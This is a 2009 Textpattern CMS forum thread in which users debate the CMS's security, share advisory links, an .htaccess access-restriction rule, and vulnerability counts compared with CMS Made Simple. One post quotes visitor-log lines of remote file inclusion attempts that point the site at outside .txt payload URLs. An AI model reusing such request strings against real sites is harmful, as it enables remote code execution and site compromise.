Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Re: How to begin setup installation
What is in your .htaccess file in that directory?
Piwik Dashboard, Google Analytics Dashboard, Minibar, Article Image Colorpicker, Admin Datepicker, Admin Google Map, Admin Colorpicker
Offline
Re: How to begin setup installation
sarah wrote:
I’ve been on a few digital security sites, and textpatten seems to have a lot of security bugs.
Hi Sarah. I run PHPXref, my visitor logs are full of urls that end in .txt or funky looking urls trying to exploit some flaw in the software. Mind you, these script kiddies and/or bots are not very smart, many of them are trying to exploit know flaws in the PHP software I cross reference on my site. The site has been running fine for almost 4 years now, not a single exploit, hiccup or what have you.
It is advised to rename the textpattern folder.
Place an .htaccess in the /textpattern folder like this one:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !textpattern(/setup)?/?$
RewriteCond %{REQUEST_FILENAME} !textpattern/((setup/)?index|css)\.php$
RewriteCond %{REQUEST_FILENAME} !textpattern/textpattern\.(css|js)$
RewriteCond %{REQUEST_FILENAME} !textpattern/jquery\.js$
RewriteCond %{REQUEST_FILENAME} !textpattern/txp_img/.+\.(jpg|gif|png)$
RewriteRule ^(.*) - [F]
</IfModule>Like Els said, please point us to these security bulletins.
We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make
Offline
Re: How to begin setup installation
sarah wrote:
… but I don’t agree that textpattern is secure enough.
I’ve been on a few digital security sites, and textpatten seems to have a lot of security bugs. It is advised to rename the textpattern folder.
Can you provide URLs for websites that make such claims?
Renaming a folder wouldn’t fix a security bug, just obscure it. TXP devs prefer fixing bugs instead of hiding them.
Offline
#16 2009-08-14 11:26:23
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
Els, hcgtv and Ruud, here are the sites referencing Textpatterns security bugs:
http://www.securityfocus.com/bid/27606/discuss
Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.
A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
These issues affect Textpattern 4.0.5; other versions may also be vulnerable.
http://secunia.com/advisories/28793/
Offline
#17 2009-08-14 11:31:29
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
Mattd, you asked what was in my .htaccess file, well there are 2 htcascess files.
The one which is there upon installation, and the other one in the “myadmin” folder, which I created, is basically the security code which comes from textpatterns web page on “how to make textpattern more secure”.
The code in the latter .htaccess file is almost identical to the code that hcgtv posted, on post 14.
Offline
#18 2009-08-14 11:40:38
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
Hcgtv,
In regards to PHPxef, I take it that this is the site you got the software from:
http://phpxref.com/
Can you tell me exactly what you downloaded to view visitor logs?
It’s comforting to know that the buggy scripts that hackers use are unsuccessful in intruding into your site .
It’s just that Textpatern, which doens’t seem to be as popular as “CMS Made Simple”- sees to have had more known bugs than CMS Made Simple.
I was concerned…
Offline
Re: How to begin setup installation
sarah wrote:
It’s just that Textpatern, which doens’t seem to be as popular as “CMS Made Simple”- sees to have had more known bugs than CMS Made Simple.
i highly doubt that. did you look at cms made simples secunia statistics? it has WAY more. http://secunia.com/advisories/26928/
Offline
Re: How to begin setup installation
sarah wrote:
Can you tell me exactly what you downloaded to view visitor logs?
Textpattern has a tab in the backend that lets you see who’s visited your site.
Let me give you examples of what I see:
211.75.220.49 index.php?c=http://pekipug.com/id1.txt??
131.203.76.246 index.php?themesdir=http://www.edu-math.com/upload_question_images/fx29id1.txt?
211.75.220.49 index.php?template=http://pekipug.com/id1.txt??
190.144.44.36 /?page=http://www.freewebtown.com/fucku8/fx29id1.txt??
64.202.120.88 /index.php?page=http://www.oming.com//master-id.txt?Those are just some I picked from the last hour, this kind of stuff goes on all day. If Textpattern was vulnerable, as the links you provide say, don’t you think my site would of been hacked by now?
We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make
Offline
Re: How to begin setup installation
sarah wrote:
Els, hcgtv and Ruud, here are the sites referencing Textpatterns security bugs:
http://www.securityfocus.com/bid/27606/discuss
Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.
A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
These issues affect Textpattern 4.0.5; other versions may also be vulnerable.
http://secunia.com/advisories/28793/
thanks for the links!
In fact, these sites confirm that Textpattern is very secure! There’s been only one discovered (mild)vulnerability over the years, in Textpattern 4.0.5.
Some lists of vulnerabilities:
Textpattern
Wordpress
CMS Made Simple
As said in the disclaimer, don’t compare sortwares with the number of found vulnerabilities. The important part is the developer’s reactivity to correct them.
Last edited by PascalL (2009-08-14 13:11:57)
Offline
#22 2009-08-14 13:27:14
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
iblastoff wrote:
i highly doubt that. did you look at cms made simples secunia statistics? it has WAY more. http://secunia.com/advisories/26928/
I see…
It’s just I couldn’t find any sites referencing CMS Made Simple’s bugs when doing a google search…
Offline
#23 2009-08-14 13:32:14
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
hcgtv,
Thank you so much for the info you provided about the tab in Textpattern with the text files hackers try to input into your site!
But what does “PHPxef” do for you, and how?
Also, what are the signs that you site has been hacked?
Thanks!
Offline
#24 2009-08-14 13:42:46
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
PascalL, thanks for the links to the site you posted.
You’re right- CMS Made Simple is worse than Textpattern.
Going by the info on the links of the site you provided, these are how the vulnerabilities of “Textpattern” compare to “CMS Made Simple’s” vulnerabilities:
http://secunia.com/advisories/product/17462/?task=advisories
http://secunia.com/advisories/product/13129/?task=advisories
Textpattern: 1 Secunia advisories 3 Vulnerabilities
CMS Made Simple: 7 Secunia advisories 13 Vulnerabilities
Last edited by sarah (2009-08-14 14:14:11)
Offline